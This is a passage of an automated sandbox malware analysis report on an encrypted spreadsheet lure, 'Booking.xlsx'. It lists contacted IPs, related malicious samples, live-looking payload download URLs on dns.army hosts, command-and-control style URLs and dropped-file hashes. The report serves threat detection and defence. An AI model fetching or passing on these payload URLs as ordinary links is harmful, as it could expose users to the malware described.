                                                                                                                                      http://search.orange.co.uk/favicon.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://www.iask.com/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://www.tesco.com/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://cgi.search.biglobe.ne.jp/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        http://search.seznam.cz/favicon.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://suche.freenet.de/favicon.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://search.interpark.com/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              http://search.espn.go.com/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://www.myspace.com/favicon.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://search.centrum.cz/favicon.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://p.zhongsou.com/favicon.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://service2.bfast.com/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://www.%s.comPAexplorer.exe, 00000007.00000002.2380506193.0000000001C70000.00000002.00000001.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    low
                                                                                                                                                    http://ariadna.elmundo.es/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://www.news.com.au/favicon.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://www.cdiscount.com/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://www.tiscali.it/favicon.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                          high

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
103.141.138.118 | unknown | Viet Nam | 135905 | VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | false
160.153.136.3 | unknown | United States | 21501 | GODADDY-AMSDE | true
54.67.120.65 | unknown | United States | 16509 | AMAZON-02US | false
81.169.145.165 | unknown | Germany | 6724 | STRATOSTRATOAGDE | true

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 356846
Start date: 23.02.2021
Start time: 17:46:14
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 33s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Booking.xlsx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLSX@11/8@6/4
EGA Information: Failed
HDC Information:
  • Successful, ratio: 16.4% (good quality ratio 14.9%)
  • Quality average: 64.8%
  • Quality standard deviation: 30.4%
HCA Information:
  • Successful, ratio: 99%
  • Number of executed functions: 91
  • Number of non-executed functions: 48
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .xlsx
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtCreateFile calls found.
  • Report size getting too big, too many NtEnumerateValueKey calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time | Type | Description
17:47:14 | API Interceptor | 88x Sleep call for process: EQNEDT32.EXE modified
17:47:18 | API Interceptor | 76x Sleep call for process: vbc.exe modified
17:47:42 | API Interceptor | 230x Sleep call for process: NETSTAT.EXE modified
17:48:18 | API Interceptor | 1x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                                                                                                          IMG-CMR.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • workfinestdysanothtp.dns.army/worksdoc/svchost.exe
                                                                                                                                                          SHIPPING DOCUMENTS.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • workfinewsdysanother.dns.army/worksdoc/svchost.exe
                                                                                                                                                          New Import and Export Regulation.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • stdyworkfinesanotherrainbowlomoyentstfcp.ydns.eu/worksdoc/svchost.exe
                                                                                                                                                          160.153.136.30O9BJfVJi6fEMoS.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.buysellleasewithlisa.com/uszn/?I48=mPpTgQkduQgKd9eKHDnKxG7Zl5xM97I2KtefNy7cE9uF2W6RPqZ+V0j9JFBrxigWFYGz&ofrxU=yVMtQLoX
                                                                                                                                                          NewOrder.xlsmGet hashmaliciousBrowse
                                                                                                                                                          • www.actranslate.com/tub0/?azuxWju=9kUE4sav2/LP9TrJDc67J8k/k24+lu0rgVtnj1PSEEeZ6JBjpW2Bsvw8EuVgnFTTtvZW5g==&0dt=YtdhwPcHS
                                                                                                                                                          22 FEB -PROCESSING.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • www.ondemandbarbering.com/bw82/?GZopM=kvuD_XrpiP&RFQx_=/uLN5+rz6Tt97hDEoOKXvxUOX9d2FCRa7e+MtK6cN7T3OLj7ozaH3+uXpMzRvYE3VPiI2g==
                                                                                                                                                          AWB-INVOICE_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.powermindcoaching.com/idir/?jFNhC=hwkvgHy48ghmImMWzAdxmMIc2NJmaXdSmdjKS++gC1c6cUK6HyWTzvaAxwVCC50AN/AR7yL8cw==&PlHT0=_6g89p5H3xehg
                                                                                                                                                          7R29qUuJef.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.dealsonwheeeles.com/bw82/?YliL=YNoZp1cRA6SVOqyJymFogp2JCj7FMVLhyO5okn1qVTKMcBnM1o+1nt1kFwvDwcyajWVF&RX=dn9dSBwpLLodPRy
                                                                                                                                                          YSZiV5Oh2E.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.exlineinsurance.com/bw82/?-Zw=BmIsBElqWbiwomt7kqeO/+wp1eRqaF5UDtohozSbguw2D9Dle/F6SI7yp6GDrJeBiJjd&2db=X48HMfxHw
                                                                                                                                                          urgent specification request.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.outlandsolar.com/2bg/?U8PL=7TNFGO6h+cLsCe9WqKO5KavC14kfAdNf0RXsPfpEmi107dhQEjNaTQA0ociJiRXcgv2T&RfutZJ=0V0hlT
                                                                                                                                                          Shinshin Machinery.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.damsalon.com/gbr/?Jt7=pr7uWOYRsJDRipSc6LqHuFigeOgMzLOmyeKvzvM0wfiSvj5dfyV9gMbHr1N8izqMn2jS&EHO8qf=NJEx_TihIRV
                                                                                                                                                          CMahQwuvAE.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.exlineinsurance.com/bw82/?CneDg=BmIsBElqWbiwomt7kqeO/+wp1eRqaF5UDtohozSbguw2D9Dle/F6SI7yp5m57Y+54uCa&Dxlpd=2dmp
                                                                                                                                                          PO#652.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.perfectretreatswa.com/m3de/?dh0xl=h3j1g3POPHTWNx2N+jSnQO346+B5orLOTEGPtqWf6pBCWAHCTVcIhjzWzcYMkUeBNfau&BR=CvPh
                                                                                                                                                          wfEePDdnmR.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.inspirationaltraveler.com/nins/?2d8=Mz//N96d1Ihtzlso+qSNYnkQ9jNTRICMtKfPgONg/PX+ANFGqFTibYTp9iPXBB/QQDlm&BRA0vf=YV8l2Jn0
                                                                                                                                                          po.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.navedeserti.com/wtb/?DxoHn=2daDG&tdcxfR=iJn2qUWcrX+THt7ztONDVSw154pCm/e/819yFFsTHK2bt8EdJNnlyFdDUp8nT/PlIn8N
                                                                                                                                                          Details!!.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.christiandailyusa.com/t052/?Txlp=DVgTZPS8Krg0RZ&al88_FR8=prdv1VbO4ZDHQQDUocIIxOCDVaUGE+sUaaTmxsuBezDKZQ10clVSR+BHlmembIIHOWLX
                                                                                                                                                          AANK5mcsUZ.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.concordhomeevaluation.com/da0a/?EjY=dhrdFxjxtJ0&1bz=uHvI5XDJRRwa0e/jvHGHCOuwedukss94ZBLyrjL/W13bRufq2/ti6Aznlr12+W//4IHP
                                                                                                                                                          PvvkzXgMjG.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.outlandsolar.com/gzcj/?zn=JUZKXajlNXjpQYlDvuULx9hFkGkc6cgVjrKumN4gZ4Gr+v3bF1Kxf6NoT7+UFLOkUugDfVPosw==&SP=DjfD_VNP4PYp
                                                                                                                                                          tXoqs48Ta9.rtfGet hashmaliciousBrowse
                                                                                                                                                          • www.advancedcaremedical.com/c239/?XR-p=zpv5YNWkyED4aJQT1xTIqe2DeNtx0w0G3KSLnaFCQFJ0w1SlmGrhhCPhUjNVyp2kxjsvXw==&LN9xg=7nG07PO0Dbw8PFL
                                                                                                                                                          q2o0a1neTm.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.loyaloneconstruction.com/xle/?u6u4=hBWp7l4HSL7&MZQL=B5+FpCrInFWhwdy/i7r7A6LlEeg4FVV+oUpb9TtWxSwXGmzxoDeRx/BGcDAiYnFLRRy1
                                                                                                                                                          VgO6Tbd7Rx.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.abhisclub.com/rgc/
                                                                                                                                                          8nxKYwJna8.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.fixmygearfast.com/csv8/?UT=EhUhb4&OjKL3=bczMUAuRcAXUfehkBA3FaFpfgVKghqiBPuGiKAiKlgeMS/vW28KC3EFG87zxnYW1TCT6
                                                                                                                                                          PR Agreement FEB2021.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • www.dealsonwheeeles.com/bw82/?rDHt=YNoZp1cUA9SRO6+FwmFogp2JCj7FMVLhyOh44kprRzKNcwLKy4v5xpNmGWjF7tmR2whyYA==&9rbPKt=zzr4Wp8XVp9

Domains

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                                                                                                          quote.exeGet hashmaliciousBrowse
                                                                                                                                                          • 103.89.88.238
                                                                                                                                                          Our New Order Feb 22 2021 at 2.30_PVV440_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                          • 103.114.107.184
                                                                                                                                                          RFQ Manual Supersucker en Espaol.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 103.141.138.128
                                                                                                                                                          quotation10204168.dox.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 103.140.251.164
                                                                                                                                                          notice of arrival.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 103.147.184.10
                                                                                                                                                          22-2-2021 .xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 103.141.138.118
                                                                                                                                                          Shipping_Document.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 103.141.138.119
                                                                                                                                                          GODADDY-AMSDE0O9BJfVJi6fEMoS.exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.136.3
                                                                                                                                                          Quotation Reques.exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.133.87
                                                                                                                                                          4pFzkB6ePK.exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.128.38
                                                                                                                                                          NewOrder.xlsmGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.136.3
                                                                                                                                                          22 FEB -PROCESSING.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.136.3
                                                                                                                                                          AWB-INVOICE_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.136.3
                                                                                                                                                          7R29qUuJef.exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.136.3
                                                                                                                                                          YSZiV5Oh2E.exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.136.3
                                                                                                                                                          urgent specification request.exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.136.3
                                                                                                                                                          Shinshin Machinery.exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.136.3
                                                                                                                                                          CMahQwuvAE.exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.136.3
                                                                                                                                                          PO#652.exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.136.3
                                                                                                                                                          Claim-1097837726-02162021.xlsGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.137.40
                                                                                                                                                          Claim-509072992-02162021.xlsGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.137.40
                                                                                                                                                          wfEePDdnmR.exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.136.3
                                                                                                                                                          955037-012021-98_98795947.docGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.137.14
                                                                                                                                                          po.exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.136.3
                                                                                                                                                          Details!!.exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.136.3
                                                                                                                                                          AANK5mcsUZ.exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.136.3
                                                                                                                                                          PvvkzXgMjG.exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.136.3

                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                          No context

                                                                                                                                                          Dropped Files

                                                                                                                                                          No context

                                                                                                                                                          Created / dropped Files

                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1]
                                                                                                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):458240
                                                                                                                                                          Entropy (8bit):7.598110124449528
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:IU5VLxPv1XYRaFTl3corvZDruuCwgrd3P:1VlVXYUFTSorvRSww3P
                                                                                                                                                          MD5:CACC98CE31DE0F63F04834BF952AC3DC
                                                                                                                                                          SHA1:064A71647FB159152BA653654B0C02024B44DADC
                                                                                                                                                          SHA-256:78F83F782F8D2077DD50D65BADB4ED36EC24C029241287F76560E60733B61C29
                                                                                                                                                          SHA-512:3910B1B22CCCA3FFBCC22A7181ABB5330C4ADF5E0B55C67ED3B507ED55365F721F360CDEB0A302C8FA40ACD87D67EABEE54D0392589B486FC9155560B7EF9C65
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 15%
                                                                                                                                                          Reputation:low
                                                                                                                                                          IE Cache URL:http://thdyworkfinerainbotm.dns.army/findoc/svchost.exe?platform=hootsuite
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\56E156B3.emf
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):653280
                                                                                                                                                          Entropy (8bit):2.898618787806911
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:534UL0tS6WB0JOqFVY5QcARI/McGdAT9kRLFdtSyUu50yknG/qc+x:x4UcLe0JOqQQZR8MDdATCR3tS+jqcC
                                                                                                                                                          MD5:296906001A7181BF226103C25DA8405D
                                                                                                                                                          SHA1:3F82C334E3AC190259DA9E13BC0903246746ECBF
                                                                                                                                                          SHA-256:744F589A7F6720BAA98F9CDC0187A18DD36658246ECFC376A7809EA3262960FF
                                                                                                                                                          SHA-512:CB280941E6D4A24D9C848771017976AFD3C9B93BEB1BBBABE0D1866A27D0486AF094729F8D57F957B0C19CE1FD299232AE6355883408587C6612B7C989906AB7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\622BF639.jpeg
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):48770
                                                                                                                                                          Entropy (8bit):7.801842363879827
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                          MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                          SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                          SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                          SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8BE736E6.png
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:PNG image data, 712 x 712, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):111378
                                                                                                                                                          Entropy (8bit):7.963743447431302
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:AE34q7rqNP36BuuQOlx2UXdx+yx9uWqFOp:b3brGP3lujnd3Fx9Pqgp
                                                                                                                                                          MD5:5ACDB72AF63832D23CED937B6B976471
                                                                                                                                                          SHA1:BC754ECEF3BEC86C6AFCC1AF644190AAFC34D9B7
                                                                                                                                                          SHA-256:6D73F61D9E2A5E01DEE491E4E1F8600E0409879B86DB69B193CCF31CFD517DF3
                                                                                                                                                          SHA-512:FAE05526AA18F0EC0725C089A9252FEE54C995FC5D9C4590EC9DB2B0B6192AB6BD3C6CECF5703E235536433C2DAB5C0356FE95657FE9B14574C8F13320774D23
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\97136DAF.jpeg
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):48770
                                                                                                                                                          Entropy (8bit):7.801842363879827
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                          MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                          SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                          SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                          SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A977B918.png
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:PNG image data, 712 x 712, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):111378
                                                                                                                                                          Entropy (8bit):7.963743447431302
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:AE34q7rqNP36BuuQOlx2UXdx+yx9uWqFOp:b3brGP3lujnd3Fx9Pqgp
                                                                                                                                                          MD5:5ACDB72AF63832D23CED937B6B976471
                                                                                                                                                          SHA1:BC754ECEF3BEC86C6AFCC1AF644190AAFC34D9B7
                                                                                                                                                          SHA-256:6D73F61D9E2A5E01DEE491E4E1F8600E0409879B86DB69B193CCF31CFD517DF3
                                                                                                                                                          SHA-512:FAE05526AA18F0EC0725C089A9252FEE54C995FC5D9C4590EC9DB2B0B6192AB6BD3C6CECF5703E235536433C2DAB5C0356FE95657FE9B14574C8F13320774D23
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                          C:\Users\user\Desktop\~$Booking.xlsx
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):330
                                                                                                                                                          Entropy (8bit):1.4377382811115937
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                          MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                          SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                          SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                          SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                          C:\Users\Public\vbc.exe
                                                                                                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):458240
                                                                                                                                                          Entropy (8bit):7.598110124449528
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:IU5VLxPv1XYRaFTl3corvZDruuCwgrd3P:1VlVXYUFTSorvRSww3P
                                                                                                                                                          MD5:CACC98CE31DE0F63F04834BF952AC3DC
                                                                                                                                                          SHA1:064A71647FB159152BA653654B0C02024B44DADC
                                                                                                                                                          SHA-256:78F83F782F8D2077DD50D65BADB4ED36EC24C029241287F76560E60733B61C29
                                                                                                                                                          SHA-512:3910B1B22CCCA3FFBCC22A7181ABB5330C4ADF5E0B55C67ED3B507ED55365F721F360CDEB0A302C8FA40ACD87D67EABEE54D0392589B486FC9155560B7EF9C65
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 15%

                                                                                                                                                          Static File Info

                                                                                                                                                          General

                                                                                                                                                          File type:CDFV2 Encrypted
                                                                                                                                                          Entropy (8bit):7.996692090719019
                                                                                                                                                          TrID:
                                                                                                                                                          • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                          File name:Booking.xlsx
                                                                                                                                                          File size:2512384
                                                                                                                                                          MD5:889b85a1924c2498073da4f94d312cd0
                                                                                                                                                          SHA1:0384c76d8fcc5ca57b63a21a169198b8dbc1f31b
                                                                                                                                                          SHA256:3d3fc5984e22957b53d18bd58555c96b4895f4436f9ce1fed5dc2fb63878720c
                                                                                                                                                          SHA512:898875df3d2609289f70d020c024a5443ed2254ff1a1e5602f84d0c595ed495aa1d810f1843573ee0380820ef4c7b1031073830f0d9d578036608c36e62e5dd5
                                                                                                                                                          SSDEEP:49152:VOWtOEe2TfER3ULGCaoK8yXOKqVubHYqickfY9ISrhcmbgq24ScjRBPc:yE/63a7yXWwHY+kQ9ISJb2cjRBPc

                                                                                                                                                          File Icon

                                                                                                                                                          Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                          Static OLE Info

                                                                                                                                                          General

                                                                                                                                                          Document Type:OLE
                                                                                                                                                          Number of OLE Files:1

                                                                                                                                                          OLE File "Booking.xlsx"

                                                                                                                                                          Indicators

                                                                                                                                                          Has Summary Info:False
                                                                                                                                                          Application Name:unknown
                                                                                                                                                          Encrypted Document:True
                                                                                                                                                          Contains Word Document Stream:False
                                                                                                                                                          Contains Workbook/Book Stream:False
                                                                                                                                                          Contains PowerPoint Document Stream:False
                                                                                                                                                          Contains Visio Document Stream:False
                                                                                                                                                          Contains ObjectPool Stream:
                                                                                                                                                          Flash Objects Count:
                                                                                                                                                          Contains VBA Macros:False

                                                                                                                                                          Streams

                                                                                                                                                          Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                          General
                                                                                                                                                          Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:64
                                                                                                                                                          Entropy:2.73637206947
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                                          Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                          General
                                                                                                                                                          Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:112
                                                                                                                                                          Entropy:2.7597816111
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                          Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                                                                          General
                                                                                                                                                          Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:200
                                                                                                                                                          Entropy:3.13335930328
                                                                                                                                                          Base64 Encoded:False
